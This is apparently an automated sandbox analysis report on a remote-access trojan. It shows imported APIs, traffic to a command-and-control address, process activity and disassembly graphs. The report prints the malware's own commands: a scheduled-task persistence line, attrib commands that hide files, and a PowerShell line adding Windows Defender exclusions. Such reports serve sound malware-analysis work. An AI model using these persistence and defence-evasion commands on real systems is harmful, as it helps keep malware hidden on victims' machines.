                                ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

                                Possible Origin

                                Language of compilation systemCountry where language is spokenMap
                                EnglishGreat Britain
                                EnglishUnited States

                                Network Behavior

                                Snort IDS Alerts

                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                192.168.2.7194.5.98.2124974055522849885 10/10/22-07:46:46.795098TCP2849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin497405552192.168.2.7194.5.98.212

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Oct 10, 2022 07:43:43.765197039 CEST497025552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:43:44.080710888 CEST555249702194.5.98.212192.168.2.7
                                Oct 10, 2022 07:43:44.634186983 CEST497025552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:43:44.951457977 CEST555249702194.5.98.212192.168.2.7
                                Oct 10, 2022 07:43:45.540528059 CEST497025552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:43:45.859080076 CEST555249702194.5.98.212192.168.2.7
                                Oct 10, 2022 07:43:55.253792048 CEST497055552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:43:55.573554039 CEST555249705194.5.98.212192.168.2.7
                                Oct 10, 2022 07:43:56.135086060 CEST497055552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:43:56.455581903 CEST555249705194.5.98.212192.168.2.7
                                Oct 10, 2022 07:43:57.135186911 CEST497055552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:43:57.459355116 CEST555249705194.5.98.212192.168.2.7
                                Oct 10, 2022 07:44:06.468255043 CEST497065552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:44:06.789838076 CEST555249706194.5.98.212192.168.2.7
                                Oct 10, 2022 07:44:07.323549032 CEST497065552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:44:07.644769907 CEST555249706194.5.98.212192.168.2.7
                                Oct 10, 2022 07:44:08.323936939 CEST497065552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:44:08.644299984 CEST555249706194.5.98.212192.168.2.7
                                Oct 10, 2022 07:44:18.807024956 CEST497105552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:44:19.121788025 CEST555249710194.5.98.212192.168.2.7
                                Oct 10, 2022 07:44:19.637089014 CEST497105552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:44:19.963521957 CEST555249710194.5.98.212192.168.2.7
                                Oct 10, 2022 07:44:20.637248993 CEST497105552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:44:20.952883005 CEST555249710194.5.98.212192.168.2.7
                                Oct 10, 2022 07:44:30.213928938 CEST497135552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:44:30.541263103 CEST555249713194.5.98.212192.168.2.7
                                Oct 10, 2022 07:44:31.138005018 CEST497135552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:44:31.458105087 CEST555249713194.5.98.212192.168.2.7
                                Oct 10, 2022 07:44:32.138111115 CEST497135552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:44:32.452699900 CEST555249713194.5.98.212192.168.2.7
                                Oct 10, 2022 07:44:41.456307888 CEST497165552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:44:41.772486925 CEST555249716194.5.98.212192.168.2.7
                                Oct 10, 2022 07:44:42.357801914 CEST497165552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:44:42.672867060 CEST555249716194.5.98.212192.168.2.7
                                Oct 10, 2022 07:44:43.248425007 CEST497165552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:44:43.565215111 CEST555249716194.5.98.212192.168.2.7
                                Oct 10, 2022 07:44:52.751287937 CEST497185552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:44:53.066781998 CEST555249718194.5.98.212192.168.2.7
                                Oct 10, 2022 07:44:53.639935970 CEST497185552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:44:53.957890987 CEST555249718194.5.98.212192.168.2.7
                                Oct 10, 2022 07:44:54.640023947 CEST497185552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:45:15.671552896 CEST497245552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:45:15.989681005 CEST555249724194.5.98.212192.168.2.7
                                Oct 10, 2022 07:45:16.563755035 CEST497245552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:45:16.879174948 CEST555249724194.5.98.212192.168.2.7
                                Oct 10, 2022 07:45:17.563785076 CEST497245552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:45:17.881516933 CEST555249724194.5.98.212192.168.2.7
                                Oct 10, 2022 07:45:27.210954905 CEST497275552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:45:27.526170969 CEST555249727194.5.98.212192.168.2.7
                                Oct 10, 2022 07:45:28.064739943 CEST497275552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:45:28.379865885 CEST555249727194.5.98.212192.168.2.7
                                Oct 10, 2022 07:45:29.064804077 CEST497275552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:45:29.381246090 CEST555249727194.5.98.212192.168.2.7
                                Oct 10, 2022 07:45:38.521851063 CEST497295552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:45:38.837666035 CEST555249729194.5.98.212192.168.2.7
                                Oct 10, 2022 07:45:39.440584898 CEST497295552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:45:39.762968063 CEST555249729194.5.98.212192.168.2.7
                                Oct 10, 2022 07:45:40.331301928 CEST497295552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:46:01.350667000 CEST497335552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:46:01.666671038 CEST555249733194.5.98.212192.168.2.7
                                Oct 10, 2022 07:46:02.176888943 CEST497335552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:46:02.499030113 CEST555249733194.5.98.212192.168.2.7
                                Oct 10, 2022 07:46:03.005130053 CEST497335552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:46:03.319916010 CEST555249733194.5.98.212192.168.2.7
                                Oct 10, 2022 07:46:12.418920994 CEST497355552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:46:12.735430002 CEST555249735194.5.98.212192.168.2.7
                                Oct 10, 2022 07:46:13.255916119 CEST497355552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:46:13.570909977 CEST555249735194.5.98.212192.168.2.7
                                Oct 10, 2022 07:46:14.256004095 CEST497355552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:46:14.575251102 CEST555249735194.5.98.212192.168.2.7
                                Oct 10, 2022 07:46:23.612039089 CEST497375552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:46:23.927470922 CEST555249737194.5.98.212192.168.2.7
                                Oct 10, 2022 07:46:24.482264996 CEST497375552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:46:24.799122095 CEST555249737194.5.98.212192.168.2.7
                                Oct 10, 2022 07:46:25.368985891 CEST497375552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:46:46.479875088 CEST497405552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:46:46.794485092 CEST555249740194.5.98.212192.168.2.7
                                Oct 10, 2022 07:46:46.794683933 CEST497405552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:46:46.795098066 CEST497405552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:46:47.463269949 CEST497405552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:46:48.557132006 CEST497405552192.168.2.7194.5.98.212
                                Oct 10, 2022 07:46:49.908849001 CEST555249740194.5.98.212192.168.2.7

                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:07:43:25
                                Start date:10/10/2022
                                Path:C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe
                                Imagebase:0x400000
                                File size:1382294 bytes
                                MD5 hash:D32389E2207879F0B57835EABCE6FB02
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low

                                General

                                Target ID:1
                                Start time:07:43:27
                                Start date:10/10/2022
                                Path:C:\Users\user\AppData\Local\Temp\NRHRAS.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Users\user\AppData\Local\Temp\NRHRAS.exe"
                                Imagebase:0x2f0000
                                File size:51200 bytes
                                MD5 hash:9B1C1C565D60ED67CB6E1986ACD95C3A
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_S500Rat, Description: Yara detected S500Rat, Source: 00000001.00000002.321313528.0000000002CD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_S500Rat, Description: Yara detected S500Rat, Source: 00000001.00000000.238959755.00000000002F2000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_S500Rat, Description: Yara detected S500Rat, Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exe, Author: Joe Security
                                Antivirus matches:
                                • Detection: 100%, Avira
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 85%, ReversingLabs
                                • Detection: 79%, Virustotal, Browse
                                • Detection: 43%, Metadefender, Browse
                                Reputation:low

                                General

                                Target ID:2
                                Start time:07:43:30
                                Start date:10/10/2022
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /tn UALDJT.exe /tr C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe /sc minute /mo 1
                                Imagebase:0xa60000
                                File size:232960 bytes
                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Target ID:3
                                Start time:07:43:31
                                Start date:10/10/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6edaf0000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Target ID:4
                                Start time:07:43:31
                                Start date:10/10/2022
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:schtasks /create /tn UALDJT.exe /tr C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe /sc minute /mo 1
                                Imagebase:0x1050000
                                File size:185856 bytes
                                MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Target ID:5
                                Start time:07:43:31
                                Start date:10/10/2022
                                Path:C:\Windows\SysWOW64\wscript.exe
                                Wow64 process (32bit):true
                                Commandline:WSCript C:\Users\user~1\AppData\Local\Temp\UALDJT.vbs
                                Imagebase:0xa90000
                                File size:147456 bytes
                                MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000005.00000002.634250998.00000000030A3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000005.00000002.640455808.00000000032A6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000005.00000002.633552399.0000000003088000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:high

                                General

                                Target ID:6
                                Start time:07:43:33
                                Start date:10/10/2022
                                Path:C:\Windows\System32\attrib.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\Stub
                                Imagebase:0x7ff7289c0000
                                File size:21504 bytes
                                MD5 hash:FDC601145CD289C6FBC96D3F805F3CD7
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                General

                                Target ID:7
                                Start time:07:43:33
                                Start date:10/10/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6edaf0000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Target ID:8
                                Start time:07:43:33
                                Start date:10/10/2022
                                Path:C:\Windows\System32\attrib.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\Stub\Chrome.exe
                                Imagebase:0x7ff7289c0000
                                File size:21504 bytes
                                MD5 hash:FDC601145CD289C6FBC96D3F805F3CD7
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                General

                                Target ID:9
                                Start time:07:43:33
                                Start date:10/10/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6edaf0000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Target ID:10
                                Start time:07:43:39
                                Start date:10/10/2022
                                Path:C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe"
                                Imagebase:0x400000
                                File size:1382294 bytes
                                MD5 hash:D32389E2207879F0B57835EABCE6FB02
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 100%, Avira
                                • Detection: 73%, ReversingLabs

                                General

                                Target ID:12
                                Start time:07:43:49
                                Start date:10/10/2022
                                Path:C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe"
                                Imagebase:0x400000
                                File size:1382294 bytes
                                MD5 hash:D32389E2207879F0B57835EABCE6FB02
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language

                                General

                                Target ID:15
                                Start time:07:43:54
                                Start date:10/10/2022
                                Path:C:\Windows\System32\cmd.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp1D8D.tmp.bat""
                                Imagebase:0x7ff7651b0000
                                File size:273920 bytes
                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Target ID:16
                                Start time:07:43:55
                                Start date:10/10/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6edaf0000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Target ID:17
                                Start time:07:43:55
                                Start date:10/10/2022
                                Path:C:\Windows\System32\timeout.exe
                                Wow64 process (32bit):false
                                Commandline:timeout 3
                                Imagebase:0x7ff6c2ff0000
                                File size:30720 bytes
                                MD5 hash:EB9A65078396FB5D4E3813BB9198CB18
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Target ID:20
                                Start time:07:43:58
                                Start date:10/10/2022
                                Path:C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe"
                                Imagebase:0x400000
                                File size:1382294 bytes
                                MD5 hash:D32389E2207879F0B57835EABCE6FB02
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language

                                General

                                Target ID:21
                                Start time:07:44:01
                                Start date:10/10/2022
                                Path:C:\Users\user\AppData\Roaming\Stub\Chrome.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Users\user\AppData\Roaming\Stub\Chrome.exe"
                                Imagebase:0x200000
                                File size:51200 bytes
                                MD5 hash:9B1C1C565D60ED67CB6E1986ACD95C3A
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_S500Rat, Description: Yara detected S500Rat, Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exe, Author: Joe Security
                                Antivirus matches:
                                • Detection: 100%, Avira
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 85%, ReversingLabs
                                • Detection: 79%, Virustotal, Browse
                                • Detection: 43%, Metadefender, Browse

                                General

                                Target ID:24
                                Start time:07:44:06
                                Start date:10/10/2022
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
                                Imagebase:0x7ff6f4710000
                                File size:447488 bytes
                                MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET

                                General

                                Target ID:25
                                Start time:07:44:07
                                Start date:10/10/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6edaf0000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:42.5%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:50%
                                  Total number of Nodes:6
                                  Total number of Limit Nodes:0

                                  Callgraph

                                  • Executed
                                  • Not Executed
                                  • Opacity -> Relevance
                                  • Disassembly available
                                  callgraph 0 Function_00007FFDC3D40DC0 13 Function_00007FFDC3D407D0 0->13 23 Function_00007FFDC3D402A0 0->23 57 Function_00007FFDC3D40290 0->57 1 Function_00007FFDC3D402C0 2 Function_00007FFDC3D41340 3 Function_00007FFDC3D41B40 4 Function_00007FFDC3D40044 5 Function_00007FFDC3D40243 6 Function_00007FFDC3D41841 7 Function_00007FFDC3D41848 8 Function_00007FFDC3D41D4C 76 Function_00007FFDC3D40378 8->76 9 Function_00007FFDC3D407CC 10 Function_00007FFDC3D4114A 11 Function_00007FFDC3D4024A 12 Function_00007FFDC3D41B49 14 Function_00007FFDC3D400D0 15 Function_00007FFDC3D41BCD 16 Function_00007FFDC3D40ACD 17 Function_00007FFDC3D412D4 18 Function_00007FFDC3D40253 19 Function_00007FFDC3D41CD1 20 Function_00007FFDC3D40358 21 Function_00007FFDC3D408D5 22 Function_00007FFDC3D4025A 24 Function_00007FFDC3D4189F 25 Function_00007FFDC3D4009F 26 Function_00007FFDC3D4029F 27 Function_00007FFDC3D40C1E 28 Function_00007FFDC3D403A4 29 Function_00007FFDC3D406A1 51 Function_00007FFDC3D40208 29->51 30 Function_00007FFDC3D409A8 32 Function_00007FFDC3D40A27 30->32 58 Function_00007FFDC3D40A93 30->58 66 Function_00007FFDC3D40A5D 30->66 31 Function_00007FFDC3D402A7 33 Function_00007FFDC3D40B2C 33->13 47 Function_00007FFDC3D40300 33->47 34 Function_00007FFDC3D40D2C 34->13 35 Function_00007FFDC3D40CAC 36 Function_00007FFDC3D401AA 37 Function_00007FFDC3D403AA 38 Function_00007FFDC3D407A9 39 Function_00007FFDC3D400B0 40 Function_00007FFDC3D40734 40->51 59 Function_00007FFDC3D40098 40->59 41 Function_00007FFDC3D41D35 42 Function_00007FFDC3D4033C 43 Function_00007FFDC3D4003C 44 Function_00007FFDC3D411BB 45 Function_00007FFDC3D4103A 45->13 45->44 46 Function_00007FFDC3D4023A 48 Function_00007FFDC3D40680 49 Function_00007FFDC3D4077F 50 Function_00007FFDC3D40F88 50->13 50->57 68 Function_00007FFDC3D40268 50->68 52 Function_00007FFDC3D40288 53 Function_00007FFDC3D41E88 54 Function_00007FFDC3D4030C 55 Function_00007FFDC3D4000A 56 Function_00007FFDC3D40190 60 Function_00007FFDC3D40218 61 Function_00007FFDC3D40916 62 Function_00007FFDC3D41299 63 Function_00007FFDC3D41D99 64 Function_00007FFDC3D40260 65 Function_00007FFDC3D419DD 65->13 65->20 65->52 65->60 67 Function_00007FFDC3D40661 69 Function_00007FFDC3D418E7 70 Function_00007FFDC3D400F0 71 Function_00007FFDC3D40B6F 71->13 71->47 72 Function_00007FFDC3D40BED 73 Function_00007FFDC3D41971 74 Function_00007FFDC3D40178 75 Function_00007FFDC3D402F8 77 Function_00007FFDC3D40575 77->1 77->14 77->51 77->56 77->64 77->70 77->74 78 Function_00007FFDC3D4047C 79 Function_00007FFDC3D41B79

                                  Executed Functions

                                  Function 00007FFDC3D41D99 Relevance: 1.6, APIs: 1, Instructions: 118nativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 8 7ffdc3d41d99-7ffdc3d41e5d NtSetValueKey 12 7ffdc3d41e5f 8->12 13 7ffdc3d41e65-7ffdc3d41e82 8->13 12->13
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.330088239.00007FFDC3D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC3D40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_7ffdc3d40000_NRHRAS.jbxd
                                  Similarity
                                  • API ID: Value
                                  • String ID:
                                  • API String ID: 3702945584-0
                                  • Opcode ID: 3385f979313c35148d2acabdf793104df53527724127aa5b819118fb3ae59620
                                  • Instruction ID: 3681bdc54a7cc83dce86d9a85e782a7327db96080c834dbea5b8cc38909987ba
                                  • Opcode Fuzzy Hash: 3385f979313c35148d2acabdf793104df53527724127aa5b819118fb3ae59620
                                  • Instruction Fuzzy Hash: F031C531A0CB4C8FDB58DF58D845AE9BBF0FB69321F14416FD049D3652DB70A8468B81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00007FFDC3D41BCD Relevance: 1.6, APIs: 1, Instructions: 124registryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.330088239.00007FFDC3D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC3D40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_7ffdc3d40000_NRHRAS.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: 6f8bb5675397ce6f5bfdd5279cc1804f264d75546313a7ae75cbf16897e22ab1
                                  • Instruction ID: ffa2a9a2ed217475fa5b960d91cb83c0ce4e62ff63fc067aa8359509d4f71af8
                                  • Opcode Fuzzy Hash: 6f8bb5675397ce6f5bfdd5279cc1804f264d75546313a7ae75cbf16897e22ab1
                                  • Instruction Fuzzy Hash: D731957191CB584FDB18DF5CD8456E97BF0FBA9321F04826FE089D3252DA706845CB82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:8.4%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:4.1%
                                  Total number of Nodes:1789
                                  Total number of Limit Nodes:29
                                  execution_graph 28581 448046 CreatePopupMenu CreatePopupMenu 28582 440c49 8 API calls 28583 435457 55 API calls 28584 445e52 13 API calls 28585 43305f 89 API calls 2 library calls 28586 445660 OleSetContainedObject IsWindow DestroyWindow moneypunct 28587 443a61 EnumChildWindows 28588 445a61 GetWindowLongW GetParent GetWindowLongW GetWindowLongW 28589 43646a SendMessageTimeoutW GetWindowThreadProcessId GetCurrentThreadId AttachThreadInput 28590 44786a LoadLibraryA GetProcAddress FreeLibrary DefDlgProcW 28593 431877 54 API calls 2 library calls 28594 441672 ClientToScreen GetWindowRect PtInRect MessageBeep 28595 441078 7 API calls 28596 430003 InvalidateRect moneypunct 28597 435403 56 API calls 28599 444006 GetMenuItemInfoW _memset 28601 449c00 SendMessageW SendMessageW SendMessageW 28602 42fe05 GetWindowLongW DefDlgProcW 28603 44900d 10 API calls 28604 41320f GetStringTypeW __towlower_l 28605 430e0d LoadLibraryA GetProcAddress 28606 44560a InterlockedDecrement 28608 433a13 91 API calls 7 library calls 28609 445a11 SendMessageTimeoutW SendMessageW GetParent InvalidateRect 28610 441018 GetWindowLongW GetWindowLongW GetWindowLongW 28611 431e1f GetTempPathW GetTempFileNameW 28612 40d220 VariantClear QueryPerformanceCounter 28613 422c20 RtlUnwind 28614 434621 10 API calls 28615 445e20 6 API calls 28616 436c2b 6 API calls 28618 44982a 11 API calls 28619 43542d 55 API calls 28623 44363d GetCurrentProcess GetCurrentProcess DuplicateHandle 28624 4340c3 FlushFileBuffers 28625 40d2c0 52 API calls 28626 443ec4 ReadFile SetFilePointerEx 28627 4352c2 6 API calls 28629 4432c0 57 API calls 28630 4426cd 59 API calls _wcslen 28631 4152ca 79 API calls 3 library calls 26526 40ccd0 26566 40cc70 26526->26566 26529 42c3bb 26598 45e737 90 API calls 3 library calls 26529->26598 26531 40cd1b 26535 40cd30 26531->26535 26554 40cdad 26531->26554 26532 40cd72 26534 402780 52 API calls 26532->26534 26536 40cd80 26534->26536 26535->26532 26540 40cd8a moneypunct 26535->26540 26575 402780 26535->26575 26583 40e7d0 294 API calls 26536->26583 26537 40ce40 26584 40ceb0 53 API calls 26537->26584 26541 40ce53 26585 408f40 26541->26585 26543 40ce5b 26546 408f40 VariantClear 26543->26546 26544 42c3a0 26596 45e737 90 API calls 3 library calls 26544->26596 26545 42c31a 26589 45e737 90 API calls 3 library calls 26545->26589 26549 40ce63 26546->26549 26550 42c3ad 26597 452670 VariantClear 26550->26597 26551 40cc70 141 API calls 26551->26554 26552 42c327 26590 452670 VariantClear 26552->26590 26554->26537 26554->26544 26554->26545 26554->26551 26556 42c335 26554->26556 26557 42c370 26554->26557 26561 42c343 26554->26561 26591 452670 VariantClear 26556->26591 26594 45e737 90 API calls 3 library calls 26557->26594 26560 42c392 26595 452670 VariantClear 26560->26595 26592 45e737 90 API calls 3 library calls 26561->26592 26564 42c362 26593 452670 VariantClear 26564->26593 26599 40a780 26566->26599 26568 40cc96 26569 42bd0e 26568->26569 26570 40cc9e 26568->26570 26571 408f40 VariantClear 26569->26571 26573 408f40 VariantClear 26570->26573 26572 42bd16 26571->26572 26574 40ccb8 26573->26574 26574->26529 26574->26531 26574->26540 26576 402827 26575->26576 26582 402790 moneypunct _memmove 26575->26582 26579 4115d7 52 API calls 26576->26579 26577 4115d7 52 API calls 26578 402797 26577->26578 26580 4115d7 52 API calls 